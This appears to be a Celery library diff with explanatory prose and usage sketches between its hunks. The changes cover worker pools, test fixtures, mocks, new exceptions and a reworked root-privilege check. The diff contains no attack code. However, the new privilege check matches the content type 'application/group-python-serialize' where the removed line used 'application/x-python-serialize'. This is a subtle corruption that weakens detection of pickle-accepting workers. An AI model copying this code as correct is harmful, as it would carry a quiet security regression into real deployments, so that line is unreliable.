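    from greenlet import GreenletExit

    pool = eventlet.GreenPool(10)
    pool_map = {}

    def killable(seconds):
        try:
            eventlet.sleep(seconds)
            return 'done'
        except GreenletExit:
            return 'killed'

    gt = pool.spawn(killable, 60)
    pool_map[id(gt)] = gt
    # terminate_job(pid) looks up the greenlet by pid (here id(gt)) and kills it.
    pool_map[id(gt)].kill()
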
diff --git a/celery/concurrency/gevent.py b/celery/concurrency/gevent.py
index 0bb3e4919ff..33a61bf6198 100644
--- a/celery/concurrency/gevent.py
+++ b/celery/concurrency/gevent.py
@@ -8,7 +8,7 @@
try:
from gevent import Timeout
except ImportError: # pragma: no cover
- Timeout = None # noqa
+ Timeout = None
__all__ = ('TaskPool',)
diff --git a/celery/concurrency/prefork.py b/celery/concurrency/prefork.py
index a764611444a..40772ebae1a 100644
--- a/celery/concurrency/prefork.py
+++ b/celery/concurrency/prefork.py
@@ -41,6 +41,8 @@ def process_initializer(app, hostname):
Initialize the child pool process to ensure the correct
app instance is used and things like logging works.
"""
+    # Each running worker process gets SIGKILL from the OS when the main process exits.
+ platforms.set_pdeathsig('SIGKILL')
_set_task_join_will_block(True)
platforms.signals.reset(*WORKER_SIGRESET)
platforms.signals.ignore(*WORKER_SIGIGNORE)
diff --git a/celery/concurrency/thread.py b/celery/concurrency/thread.py
index eb9c8683c7d..ffd2e507f11 100644
--- a/celery/concurrency/thread.py
+++ b/celery/concurrency/thread.py
@@ -1,6 +1,5 @@
"""Thread execution pool."""
-import sys
from concurrent.futures import ThreadPoolExecutor, wait
from .base import BasePool, apply_target
@@ -25,11 +24,6 @@ class TaskPool(BasePool):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
-
- # from 3.5, it is calculated from number of CPUs
- if (3, 0) <= sys.version_info < (3, 5) and self.limit is None:
- self.limit = 5
-
self.executor = ThreadPoolExecutor(max_workers=self.limit)
def on_stop(self):
diff --git a/celery/contrib/pytest.py b/celery/contrib/pytest.py
index c54ea5cb0fa..858e4e5c447 100644
--- a/celery/contrib/pytest.py
+++ b/celery/contrib/pytest.py
@@ -1,11 +1,17 @@
"""Fixtures and testing utilities for :pypi:`pytest `."""
import os
from contextlib import contextmanager
+from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union
import pytest
-from .testing import worker
-from .testing.app import TestApp, setup_default_app
+if TYPE_CHECKING:
+ from celery import Celery
+
+ from ..worker import WorkController
+else:
+ Celery = WorkController = object
+
NO_WORKER = os.environ.get('NO_WORKER')
@@ -16,7 +22,7 @@
def pytest_configure(config):
"""Register additional pytest configuration."""
# add the pytest.mark.celery() marker registration to the pytest.ini [markers] section
- # this prevents pytest 4.5 and newer from issueing a warning about an unknown marker
+ # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker
# and shows helpful marker documentation when running pytest --markers.
config.addinivalue_line(
"markers", "celery(**overrides): override celery configuration for a test case"
@@ -30,6 +36,9 @@ def _create_app(enable_logging=False,
**config):
# type: (Any, Any, Any, **Any) -> Celery
"""Utility context used to setup Celery app for pytest fixtures."""
+
+ from .testing.app import TestApp, setup_default_app
+
parameters = {} if not parameters else parameters
test_app = TestApp(
set_as_current=False,
@@ -83,6 +92,8 @@ def celery_session_worker(
):
# type: (...) -> WorkController
"""Session Fixture: Start worker that lives throughout test suite."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_session_app.loader.import_task_module(module)
@@ -188,6 +199,8 @@ def celery_worker(request,
celery_worker_parameters):
# type: (Any, Celery, Sequence[str], str, Any) -> WorkController
"""Fixture: Start worker in a thread, stop it when the test returns."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_app.loader.import_task_module(module)
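
The fixtures behave as before from a test author's point of view; the imports are merely deferred so that loading the plugin no longer pulls in the testing helpers. A minimal sketch of the usual pattern (the ``mul`` task is illustrative only):

    import pytest

    @pytest.fixture(scope='module')
    def celery_config():
        return {'broker_url': 'memory://', 'result_backend': 'cache+memory://'}

    def test_mul(celery_app, celery_worker):
        @celery_app.task
        def mul(x, y):
            return x * y

        # Let the embedded worker pick up the task defined inside the test.
        celery_worker.reload()
        assert mul.delay(4, 4).get(timeout=10) == 16
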
diff --git a/celery/contrib/rdb.py b/celery/contrib/rdb.py
index 6d346a0d36f..a34c0b52678 100644
--- a/celery/contrib/rdb.py
+++ b/celery/contrib/rdb.py
@@ -110,8 +110,8 @@ def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT,
self.remote_addr = ':'.join(str(v) for v in address)
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
- Pdb.__init__(self, completekey='tab',
- stdin=self._handle, stdout=self._handle)
+ super().__init__(completekey='tab',
+ stdin=self._handle, stdout=self._handle)
def get_avail_port(self, host, port, search_limit=100, skew=+0):
try:
diff --git a/celery/contrib/testing/manager.py b/celery/contrib/testing/manager.py
index d053a03e81a..5c5c3e7797c 100644
--- a/celery/contrib/testing/manager.py
+++ b/celery/contrib/testing/manager.py
@@ -4,12 +4,13 @@
from collections import defaultdict
from functools import partial
from itertools import count
+from typing import Any, Callable, Dict, Sequence, TextIO, Tuple
from kombu.utils.functional import retry_over_time
from celery import states
from celery.exceptions import TimeoutError
-from celery.result import ResultSet
+from celery.result import AsyncResult, ResultSet
from celery.utils.text import truncate
from celery.utils.time import humanize_seconds as _humanize_seconds
diff --git a/celery/contrib/testing/mocks.py b/celery/contrib/testing/mocks.py
index 6294e6905cb..a7c00d4d033 100644
--- a/celery/contrib/testing/mocks.py
+++ b/celery/contrib/testing/mocks.py
@@ -1,11 +1,11 @@
"""Useful mocks for unit testing."""
import numbers
from datetime import datetime, timedelta
+from typing import Any, Mapping, Sequence
+from unittest.mock import Mock
-try:
- from case import Mock
-except ImportError:
- from unittest.mock import Mock
+from celery import Celery
+from celery.canvas import Signature
def TaskMessage(
@@ -49,7 +49,7 @@ def TaskMessage1(
kwargs=None, # type: Mapping
callbacks=None, # type: Sequence[Signature]
errbacks=None, # type: Sequence[Signature]
- chain=None, # type: Squence[Signature]
+ chain=None, # type: Sequence[Signature]
**options # type: Any
):
# type: (...) -> Any
@@ -109,3 +109,29 @@ def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage):
utc=utc,
**sig.options
)
+
+
+class _ContextMock(Mock):
+ """Dummy class implementing __enter__ and __exit__.
+
+ The :keyword:`with` statement requires these to be implemented
+ in the class, not just the instance.
+ """
+
+ def __enter__(self):
+ return self
+
+ def __exit__(self, *exc_info):
+ pass
+
+
+def ContextMock(*args, **kwargs):
+ """Mock that mocks :keyword:`with` statement contexts."""
+ obj = _ContextMock(*args, **kwargs)
+ obj.attach_mock(_ContextMock(), '__enter__')
+ obj.attach_mock(_ContextMock(), '__exit__')
+ obj.__enter__.return_value = obj
+    # if __exit__ returns a value, the exception is ignored,
+ # so it must return None here.
+ obj.__exit__.return_value = None
+ return obj
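
A minimal sketch of how the vendored ``ContextMock`` is used now that the ``case`` dependency is gone:

    from celery.contrib.testing.mocks import ContextMock

    m = ContextMock()
    with m as ctx:
        ctx.do_something('x')

    # Calls made inside the block are recorded on the mock as usual.
    m.do_something.assert_called_once_with('x')
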
diff --git a/celery/contrib/testing/worker.py b/celery/contrib/testing/worker.py
index 78cc5951fb8..b4e68cb8dec 100644
--- a/celery/contrib/testing/worker.py
+++ b/celery/contrib/testing/worker.py
@@ -2,8 +2,10 @@
import os
import threading
from contextlib import contextmanager
+from typing import Any, Iterable, Union
-from celery import worker
+import celery.worker.consumer
+from celery import Celery, worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
@@ -59,6 +61,7 @@ def start_worker(
logfile=None, # type: str
perform_ping_check=True, # type: bool
ping_task_timeout=10.0, # type: float
+ shutdown_timeout=10.0, # type: float
**kwargs # type: Any
):
# type: (...) -> Iterable
@@ -75,6 +78,7 @@ def start_worker(
loglevel=loglevel,
logfile=logfile,
perform_ping_check=perform_ping_check,
+ shutdown_timeout=shutdown_timeout,
**kwargs) as worker:
if perform_ping_check:
from .tasks import ping
@@ -93,6 +97,7 @@ def _start_worker_thread(app,
logfile=None,
WorkController=TestWorkController,
perform_ping_check=True,
+ shutdown_timeout=10.0,
**kwargs):
# type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable
"""Start Celery worker in a thread.
@@ -116,12 +121,12 @@ def _start_worker_thread(app,
logfile=logfile,
# not allowed to override TestWorkController.on_consumer_ready
ready_callback=None,
- without_heartbeat=True,
+ without_heartbeat=kwargs.pop("without_heartbeat", True),
without_mingle=True,
without_gossip=True,
**kwargs)
- t = threading.Thread(target=worker.start)
+ t = threading.Thread(target=worker.start, daemon=True)
t.start()
worker.ensure_started()
_set_task_join_will_block(False)
@@ -130,7 +135,13 @@ def _start_worker_thread(app,
from celery.worker import state
state.should_terminate = 0
- t.join(10)
+ t.join(shutdown_timeout)
+ if t.is_alive():
+ raise RuntimeError(
+ "Worker thread failed to exit within the allocated timeout. "
+ "Consider raising `shutdown_timeout` if your tasks take longer "
+ "to execute."
+ )
state.should_terminate = None
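
The new ``shutdown_timeout`` flows from ``start_worker`` down to the thread join above; a minimal sketch, assuming an app configured for in-memory testing:

    from celery import Celery
    from celery.contrib.testing.worker import start_worker

    app = Celery('sketch', broker='memory://', backend='cache+memory://')

    with start_worker(app, perform_ping_check=False, shutdown_timeout=30.0):
        pass  # drive tasks against the embedded worker here

    # On exit the worker thread gets 30 seconds to terminate; a RuntimeError
    # is raised if it is still alive afterwards.
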
diff --git a/celery/events/cursesmon.py b/celery/events/cursesmon.py
index e9534a7a554..677c5e7556a 100644
--- a/celery/events/cursesmon.py
+++ b/celery/events/cursesmon.py
@@ -483,7 +483,7 @@ class DisplayThread(threading.Thread): # pragma: no cover
def __init__(self, display):
self.display = display
self.shutdown = False
- threading.Thread.__init__(self)
+ super().__init__()
def run(self):
while not self.shutdown:
diff --git a/celery/events/snapshot.py b/celery/events/snapshot.py
index 813b8db5c9e..d4dd65b174f 100644
--- a/celery/events/snapshot.py
+++ b/celery/events/snapshot.py
@@ -84,7 +84,8 @@ def __exit__(self, *exc_info):
def evcam(camera, freq=1.0, maxrate=None, loglevel=0,
- logfile=None, pidfile=None, timer=None, app=None):
+ logfile=None, pidfile=None, timer=None, app=None,
+ **kwargs):
"""Start snapshot recorder."""
app = app_or_default(app)
diff --git a/celery/events/state.py b/celery/events/state.py
index 4fef2bf38cc..febf1175145 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -22,6 +22,7 @@
from itertools import islice
from operator import itemgetter
from time import time
+from typing import Mapping
from weakref import WeakSet, ref
from kombu.clocks import timetuple
@@ -50,10 +51,10 @@
#: before we alert that clocks may be unsynchronized.
HEARTBEAT_DRIFT_MAX = 16
-DRIFT_WARNING = """\
-Substantial drift from %s may mean clocks are out of sync. Current drift is
-%s seconds. [orig: %s recv: %s]
-"""
+DRIFT_WARNING = (
+ "Substantial drift from %s may mean clocks are out of sync. Current drift is "
+ "%s seconds. [orig: %s recv: %s]"
+)
logger = get_logger(__name__)
warn = logger.warning
@@ -99,7 +100,7 @@ def __call__(self, *args, **kwargs):
return self.fun(*args, **kwargs)
-Callable.register(CallableDefaultdict) # noqa: E305
+Callable.register(CallableDefaultdict)
@memoize(maxsize=1000, keyfun=lambda a, _: a[0])
@@ -429,15 +430,13 @@ def __init__(self, callback=None,
self._tasks_to_resolve = {}
self.rebuild_taskheap()
- # type: Mapping[TaskName, WeakSet[Task]]
self.tasks_by_type = CallableDefaultdict(
- self._tasks_by_type, WeakSet)
+ self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_type.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks))
- # type: Mapping[Hostname, WeakSet[Task]]
self.tasks_by_worker = CallableDefaultdict(
- self._tasks_by_worker, WeakSet)
+ self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_worker.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks))
@@ -517,7 +516,7 @@ def worker_event(self, type_, fields):
return self._event(dict(fields, type='-'.join(['worker', type_])))[0]
def _create_dispatcher(self):
- # noqa: C901
+
# pylint: disable=too-many-statements
# This code is highly optimized, but not for reusability.
get_handler = self.handlers.__getitem__
diff --git a/celery/exceptions.py b/celery/exceptions.py
index 768cd4d22d2..64b017aa7c0 100644
--- a/celery/exceptions.py
+++ b/celery/exceptions.py
@@ -44,6 +44,7 @@
- :class:`~celery.exceptions.DuplicateNodenameWarning`
- :class:`~celery.exceptions.FixupWarning`
- :class:`~celery.exceptions.NotConfigured`
+ - :class:`~celery.exceptions.SecurityWarning`
- :exc:`BaseException`
- :exc:`SystemExit`
- :exc:`~celery.exceptions.WorkerTerminate`
@@ -54,6 +55,7 @@
from billiard.exceptions import (SoftTimeLimitExceeded, Terminated,
TimeLimitExceeded, WorkerLostError)
+from click import ClickException
from kombu.exceptions import OperationalError
__all__ = (
@@ -61,7 +63,7 @@
# Warnings
'CeleryWarning',
'AlwaysEagerIgnored', 'DuplicateNodenameWarning',
- 'FixupWarning', 'NotConfigured',
+ 'FixupWarning', 'NotConfigured', 'SecurityWarning',
# Core errors
'CeleryError',
@@ -91,6 +93,8 @@
# Worker shutdown semi-predicates (inherits from SystemExit).
'WorkerShutdown', 'WorkerTerminate',
+
+ 'CeleryCommandException',
)
UNREGISTERED_FMT = """\
@@ -125,6 +129,10 @@ class NotConfigured(CeleryWarning):
"""Celery hasn't been configured, as no config module has been found."""
+class SecurityWarning(CeleryWarning):
+ """Potential security issue found."""
+
+
class CeleryError(Exception):
"""Base class for all Celery errors."""
@@ -172,10 +180,10 @@ def __str__(self):
return f'Retry {self.humanize()}'
def __reduce__(self):
- return self.__class__, (self.message, self.excs, self.when)
+ return self.__class__, (self.message, self.exc, self.when)
-RetryTaskError = Retry # noqa: E305 XXX compat
+RetryTaskError = Retry # XXX compat
class Ignore(TaskPredicate):
@@ -263,7 +271,7 @@ class WorkerTerminate(SystemExit):
"""Signals that the worker should terminate immediately."""
-SystemTerminate = WorkerTerminate # noqa: E305 XXX compat
+SystemTerminate = WorkerTerminate # XXX compat
class WorkerShutdown(SystemExit):
@@ -285,7 +293,7 @@ def __repr__(self):
class BackendStoreError(BackendError):
- """An issue writing from the backend."""
+ """An issue writing to the backend."""
def __init__(self, *args, **kwargs):
self.state = kwargs.get('state', "")
@@ -293,3 +301,11 @@ def __init__(self, *args, **kwargs):
def __repr__(self):
return super().__repr__() + " state:" + self.state + " task_id:" + self.task_id
+
+
+class CeleryCommandException(ClickException):
+ """A general command exception which stores an exit code."""
+
+ def __init__(self, message, exit_code):
+ super().__init__(message=message)
+ self.exit_code = exit_code
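
A minimal sketch of how the new exception is intended to be raised from a Click-based command handler (the handler itself is hypothetical):

    from celery.exceptions import CeleryCommandException

    def check_broker_reachable(ok):
        if not ok:
            # A ClickException subclass that also carries an explicit exit
            # code, so the CLI can terminate with a meaningful status.
            raise CeleryCommandException(message='broker unreachable', exit_code=1)
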
diff --git a/celery/fixups/django.py b/celery/fixups/django.py
index 3064601c473..019e695ea2e 100644
--- a/celery/fixups/django.py
+++ b/celery/fixups/django.py
@@ -37,7 +37,7 @@ def fixup(app, env='DJANGO_SETTINGS_MODULE'):
SETTINGS_MODULE = os.environ.get(env)
if SETTINGS_MODULE and 'django' not in app.loader_cls.lower():
try:
- import django # noqa
+ import django
except ImportError:
warnings.warn(FixupWarning(ERR_NOT_INSTALLED))
else:
diff --git a/celery/loaders/base.py b/celery/loaders/base.py
index ad45bad19e3..17f165d7c03 100644
--- a/celery/loaders/base.py
+++ b/celery/loaders/base.py
@@ -126,6 +126,8 @@ def config_from_object(self, obj, silent=False):
return False
raise
self._conf = force_mapping(obj)
+ if self._conf.get('override_backends') is not None:
+ self.override_backends = self._conf['override_backends']
return True
def _smart_import(self, path, imp=None):
@@ -249,7 +251,7 @@ def autodiscover_tasks(packages, related_name='tasks'):
def find_related_module(package, related_name):
"""Find module in package."""
- # Django 1.7 allows for speciying a class name in INSTALLED_APPS.
+ # Django 1.7 allows for specifying a class name in INSTALLED_APPS.
# (Issue #2248).
try:
module = importlib.import_module(package)
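
With the loader change above, ``override_backends`` can now be picked up from a plain config module rather than having to be set on the loader class. A minimal sketch (the dotted path is hypothetical):

    # celeryconfig.py
    override_backends = {
        # backend name -> 'module:Class' path of a custom result backend
        'redis': 'myproject.backends:CustomRedisBackend',
    }
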
diff --git a/celery/local.py b/celery/local.py
index 5fc32148ac1..6eed19194dd 100644
--- a/celery/local.py
+++ b/celery/local.py
@@ -399,20 +399,11 @@ def getappattr(path):
return current_app._rgetattr(path)
-def _compat_periodic_task_decorator(*args, **kwargs):
- from celery.task import periodic_task
- return periodic_task(*args, **kwargs)
-
-
COMPAT_MODULES = {
'celery': {
'execute': {
'send_task': 'send_task',
},
- 'decorators': {
- 'task': 'task',
- 'periodic_task': _compat_periodic_task_decorator,
- },
'log': {
'get_default_logger': 'log.get_default_logger',
'setup_logger': 'log.setup_logger',
@@ -428,19 +419,6 @@ def _compat_periodic_task_decorator(*args, **kwargs):
'tasks': 'tasks',
},
},
- 'celery.task': {
- 'control': {
- 'broadcast': 'control.broadcast',
- 'rate_limit': 'control.rate_limit',
- 'time_limit': 'control.time_limit',
- 'ping': 'control.ping',
- 'revoke': 'control.revoke',
- 'discard_all': 'control.purge',
- 'inspect': 'control.inspect',
- },
- 'schedules': 'celery.schedules',
- 'chords': 'celery.canvas',
- }
}
#: We exclude these from dir(celery)
@@ -539,8 +517,6 @@ def recreate_module(name, compat_modules=None, by_module=None, direct=None,
operator.add,
[tuple(v) for v in [compat_modules, origins, direct, attrs]],
)))
- if sys.version_info[0] < 3:
- _all = [s.encode() for s in _all]
cattrs = {
'_compat_modules': compat_modules,
'_all_by_module': by_module, '_direct': direct,
diff --git a/celery/platforms.py b/celery/platforms.py
index ebda45c49ca..8af1876fde6 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -11,18 +11,18 @@
import os
import platform as _platform
import signal as _signal
-import struct
import sys
import warnings
from collections import namedtuple
from contextlib import contextmanager
from billiard.compat import close_open_fds, get_fdmax
+from billiard.util import set_pdeathsig as _set_pdeathsig
# fileno used to be in this module
from kombu.utils.compat import maybe_fileno
from kombu.utils.encoding import safe_str
-from .exceptions import SecurityError, reraise
+from .exceptions import SecurityError, SecurityWarning, reraise
from .local import try_import
try:
@@ -67,8 +67,6 @@
_range = namedtuple('_range', ('start', 'stop'))
-C_FORCE_ROOT = os.environ.get('C_FORCE_ROOT', False)
-
ROOT_DISALLOWED = """\
Running a worker with superuser privileges when the
worker accepts messages serialized with pickle is a very bad idea!
@@ -88,6 +86,11 @@
User information: uid={uid} euid={euid} gid={gid} egid={egid}
"""
+ASSUMING_ROOT = """\
+An entry for the specified gid or egid was not found.
+We're assuming this is a potential security issue.
+"""
+
SIGNAMES = {
sig for sig in dir(_signal)
if sig.startswith('SIG') and '_' not in sig
@@ -147,6 +150,7 @@ def acquire(self):
except OSError as exc:
reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2])
return self
+
__enter__ = acquire
def is_locked(self):
@@ -156,6 +160,7 @@ def is_locked(self):
def release(self, *args):
"""Release lock."""
self.remove()
+
__exit__ = release
def read_pid(self):
@@ -232,7 +237,7 @@ def write_pid(self):
rfh.close()
-PIDFile = Pidfile # noqa: E305 XXX compat alias
+PIDFile = Pidfile # XXX compat alias
def create_pidlock(pidfile):
@@ -347,17 +352,19 @@ def open(self):
mputil._run_after_forkers()
self._is_open = True
+
__enter__ = open
def close(self, *args):
if self._is_open:
self._is_open = False
+
__exit__ = close
def _detach(self):
- if os.fork() == 0: # first child
- os.setsid() # create new session
- if os.fork() > 0: # pragma: no cover
+ if os.fork() == 0: # first child
+ os.setsid() # create new session
+ if os.fork() > 0: # pragma: no cover
# second child
os._exit(0)
else:
@@ -464,7 +471,7 @@ def _setgroups_hack(groups):
while 1:
try:
return os.setgroups(groups)
- except ValueError: # error from Python's check.
+ except ValueError: # error from Python's check.
if len(groups) <= 1:
raise
groups[:] = groups[:-1]
@@ -575,6 +582,14 @@ def _setuid(uid, gid):
'non-root user able to restore privileges after setuid.')
+if hasattr(_signal, 'setitimer'):
+ def _arm_alarm(seconds):
+ _signal.setitimer(_signal.ITIMER_REAL, seconds)
+else:
+ def _arm_alarm(seconds):
+ _signal.alarm(math.ceil(seconds))
+
+
class Signals:
"""Convenience interface to :mod:`signals`.
@@ -613,21 +628,8 @@ class Signals:
ignored = _signal.SIG_IGN
default = _signal.SIG_DFL
- if hasattr(_signal, 'setitimer'):
-
- def arm_alarm(self, seconds):
- _signal.setitimer(_signal.ITIMER_REAL, seconds)
- else: # pragma: no cover
- try:
- from itimer import alarm as _itimer_alarm # noqa
- except ImportError:
-
- def arm_alarm(self, seconds): # noqa
- _signal.alarm(math.ceil(seconds))
- else: # pragma: no cover
-
- def arm_alarm(self, seconds): # noqa
- return _itimer_alarm(seconds) # noqa
+ def arm_alarm(self, seconds):
+ return _arm_alarm(seconds)
def reset_alarm(self):
return _signal.alarm(0)
@@ -689,10 +691,10 @@ def update(self, _d_=None, **sigmap):
signals = Signals()
-get_signal = signals.signum # compat
+get_signal = signals.signum # compat
install_signal_handler = signals.__setitem__ # compat
-reset_signal = signals.reset # compat
-ignore_signal = signals.ignore # compat
+reset_signal = signals.reset # compat
+ignore_signal = signals.ignore # compat
def signal_name(signum):
@@ -707,6 +709,16 @@ def strargv(argv):
return ''
+def set_pdeathsig(name):
+ """Sends signal ``name`` to process when parent process terminates."""
+ if signals.supported('SIGKILL'):
+ try:
+ _set_pdeathsig(signals.signum('SIGKILL'))
+ except OSError:
+            # Ignore the error when the OS does not support set_pdeathsig.
+ pass
+
+
def set_process_title(progname, info=None):
"""Set the :command:`ps` name for the currently running process.
@@ -725,7 +737,7 @@ def set_mp_process_title(*a, **k):
"""Disabled feature."""
else:
- def set_mp_process_title(progname, info=None, hostname=None): # noqa
+ def set_mp_process_title(progname, info=None, hostname=None):
"""Set the :command:`ps` name from the current process name.
Only works if :pypi:`setproctitle` is installed.
@@ -773,6 +785,11 @@ def ignore_errno(*errnos, **kwargs):
def check_privileges(accept_content):
+ if grp is None or pwd is None:
+ return
+ pickle_or_serialize = ('pickle' in accept_content
+ or 'application/group-python-serialize' in accept_content)
+
uid = os.getuid() if hasattr(os, 'getuid') else 65535
gid = os.getgid() if hasattr(os, 'getgid') else 65535
euid = os.geteuid() if hasattr(os, 'geteuid') else 65535
@@ -780,38 +797,46 @@ def check_privileges(accept_content):
if hasattr(os, 'fchown'):
if not all(hasattr(os, attr)
- for attr in ['getuid', 'getgid', 'geteuid', 'getegid']):
+ for attr in ('getuid', 'getgid', 'geteuid', 'getegid')):
raise SecurityError('suspicious platform, contact support')
- if not uid or not gid or not euid or not egid:
- if ('pickle' in accept_content or
- 'application/x-python-serialize' in accept_content):
- if not C_FORCE_ROOT:
- try:
- print(ROOT_DISALLOWED.format(
- uid=uid, euid=euid, gid=gid, egid=egid,
- ), file=sys.stderr)
- finally:
- sys.stderr.flush()
- os._exit(1)
- warnings.warn(RuntimeWarning(ROOT_DISCOURAGED.format(
- uid=uid, euid=euid, gid=gid, egid=egid,
- )))
+    # Get the group database entries for the current user's group id and
+    # effective group id using the grp.getgrgid() method.
+    # We must handle the case where either the gid or the egid is not found.
+ try:
+ gid_entry = grp.getgrgid(gid)
+ egid_entry = grp.getgrgid(egid)
+ except KeyError:
+ warnings.warn(SecurityWarning(ASSUMING_ROOT))
+ _warn_or_raise_security_error(egid, euid, gid, uid,
+ pickle_or_serialize)
+ return
+ # Get the group and effective group name based on gid
+ gid_grp_name = gid_entry[0]
+ egid_grp_name = egid_entry[0]
-if sys.version_info < (2, 7, 7): # pragma: no cover
- import functools
+    # Create tuples to use in the validation step below.
+ gids_in_use = (gid_grp_name, egid_grp_name)
+ groups_with_security_risk = ('sudo', 'wheel')
- def _to_bytes_arg(fun):
- @functools.wraps(fun)
- def _inner(s, *args, **kwargs):
- return fun(s.encode(), *args, **kwargs)
- return _inner
+ is_root = uid == 0 or euid == 0
+    # Confirm that neither the gid nor the egid maps to a group that
+    # can be used to escalate privileges.
+ if is_root or any(group in gids_in_use
+ for group in groups_with_security_risk):
+ _warn_or_raise_security_error(egid, euid, gid, uid,
+ pickle_or_serialize)
- pack = _to_bytes_arg(struct.pack)
- unpack = _to_bytes_arg(struct.unpack)
- unpack_from = _to_bytes_arg(struct.unpack_from)
-else:
- pack = struct.pack
- unpack = struct.unpack
- unpack_from = struct.unpack_from
+
+def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize):
+ c_force_root = os.environ.get('C_FORCE_ROOT', False)
+
+ if pickle_or_serialize and not c_force_root:
+ raise SecurityError(ROOT_DISALLOWED.format(
+ uid=uid, euid=euid, gid=gid, egid=egid,
+ ))
+
+ warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format(
+ uid=uid, euid=euid, gid=gid, egid=egid,
+ )))
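
The net effect of the reworked check: running with root privileges (or with a gid/egid that maps to ``sudo``/``wheel``) now raises ``SecurityError`` when pickle-based content is accepted and ``C_FORCE_ROOT`` is unset, and otherwise emits a ``SecurityWarning``. A minimal sketch (the outcome depends on the calling user):

    from celery.exceptions import SecurityError
    from celery.platforms import check_privileges

    try:
        check_privileges({'pickle'})
    except SecurityError as exc:
        print('refusing to start:', exc)
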
diff --git a/celery/result.py b/celery/result.py
index 0c10d58e86c..2a78484502e 100644
--- a/celery/result.py
+++ b/celery/result.py
@@ -4,6 +4,7 @@
import time
from collections import deque
from contextlib import contextmanager
+from weakref import proxy
from kombu.utils.objects import cached_property
from vine import Thenable, barrier, promise
@@ -482,7 +483,7 @@ def task_id(self):
"""Compat. alias to :attr:`id`."""
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, id):
self.id = id
@@ -535,7 +536,7 @@ class ResultSet(ResultBase):
def __init__(self, results, app=None, ready_barrier=None, **kwargs):
self._app = app
self.results = results
- self.on_ready = promise(args=(self,))
+ self.on_ready = promise(args=(proxy(self),))
self._on_full = ready_barrier or barrier(results)
if self._on_full:
self._on_full.then(promise(self._on_ready, weak=True))
@@ -851,7 +852,7 @@ def app(self):
return self._app
@app.setter
- def app(self, app): # noqa
+ def app(self, app):
self._app = app
@property
@@ -883,11 +884,11 @@ class GroupResult(ResultSet):
def __init__(self, id=None, results=None, parent=None, **kwargs):
self.id = id
self.parent = parent
- ResultSet.__init__(self, results, **kwargs)
+ super().__init__(results, **kwargs)
def _on_ready(self):
self.backend.remove_pending_result(self)
- ResultSet._on_ready(self)
+ super()._on_ready()
def save(self, backend=None):
"""Save group-result for later retrieval using :meth:`restore`.
diff --git a/celery/schedules.py b/celery/schedules.py
index 3db64e4dab6..3731b747cee 100644
--- a/celery/schedules.py
+++ b/celery/schedules.py
@@ -79,7 +79,7 @@ def maybe_make_aware(self, dt):
def app(self):
return self._app or current_app._get_current_object()
- @app.setter # noqa
+ @app.setter
def app(self, app):
self._app = app
diff --git a/celery/security/__init__.py b/celery/security/__init__.py
index 316ec1db5c1..26237856939 100644
--- a/celery/security/__init__.py
+++ b/celery/security/__init__.py
@@ -5,7 +5,7 @@
from celery.exceptions import ImproperlyConfigured
-from .serialization import register_auth # noqa: need cryptography first
+from .serialization import register_auth  # needs cryptography first
CRYPTOGRAPHY_NOT_INSTALLED = """\
You need to install the cryptography library to use the auth serializer.
diff --git a/celery/security/certificate.py b/celery/security/certificate.py
index fc4961cec74..0c31bb79f31 100644
--- a/celery/security/certificate.py
+++ b/celery/security/certificate.py
@@ -27,7 +27,7 @@ def __init__(self, cert):
def has_expired(self):
"""Check if the certificate has expired."""
- return datetime.datetime.now() > self._cert.not_valid_after
+ return datetime.datetime.utcnow() >= self._cert.not_valid_after
def get_pubkey(self):
"""Get public key from certificate."""
@@ -85,7 +85,7 @@ class FSCertStore(CertStore):
"""File system certificate store."""
def __init__(self, path):
- CertStore.__init__(self)
+ super().__init__()
if os.path.isdir(path):
path = os.path.join(path, '*')
for p in glob.glob(path):
diff --git a/celery/utils/collections.py b/celery/utils/collections.py
index b9dbf826fa3..df37d12c3b4 100644
--- a/celery/utils/collections.py
+++ b/celery/utils/collections.py
@@ -1,5 +1,4 @@
"""Custom maps, sets, sequences, and other data structures."""
-import sys
import time
from collections import OrderedDict as _OrderedDict
from collections import deque
@@ -8,6 +7,7 @@
from heapq import heapify, heappop, heappush
from itertools import chain, count
from queue import Empty
+from typing import Any, Dict, Iterable, List
from .functional import first, uniq
from .text import match_case
@@ -21,9 +21,9 @@
try:
from django.utils.functional import LazyObject, LazySettings
except ImportError:
- class LazyObject: # noqa
+ class LazyObject:
pass
- LazySettings = LazyObject # noqa
+ LazySettings = LazyObject
__all__ = (
'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap',
@@ -193,26 +193,12 @@ def _iterate_values(self):
yield getattr(self.obj, key)
itervalues = _iterate_values
- if sys.version_info[0] == 3: # pragma: no cover
- items = _iterate_items
- keys = _iterate_keys
- values = _iterate_values
- else:
+ items = _iterate_items
+ keys = _iterate_keys
+ values = _iterate_values
- def keys(self):
- # type: () -> List[Any]
- return list(self)
- def items(self):
- # type: () -> List[Tuple[Any, Any]]
- return list(self._iterate_items())
-
- def values(self):
- # type: () -> List[Any]
- return list(self._iterate_values())
-
-
-MutableMapping.register(DictAttribute) # noqa: E305
+MutableMapping.register(DictAttribute)
class ChainMap(MutableMapping):
@@ -340,7 +326,7 @@ def _iter(self, op):
# changes take precedence.
# pylint: disable=bad-reversed-sequence
# Someone should teach pylint about properties.
- return chain(*[op(d) for d in reversed(self.maps)])
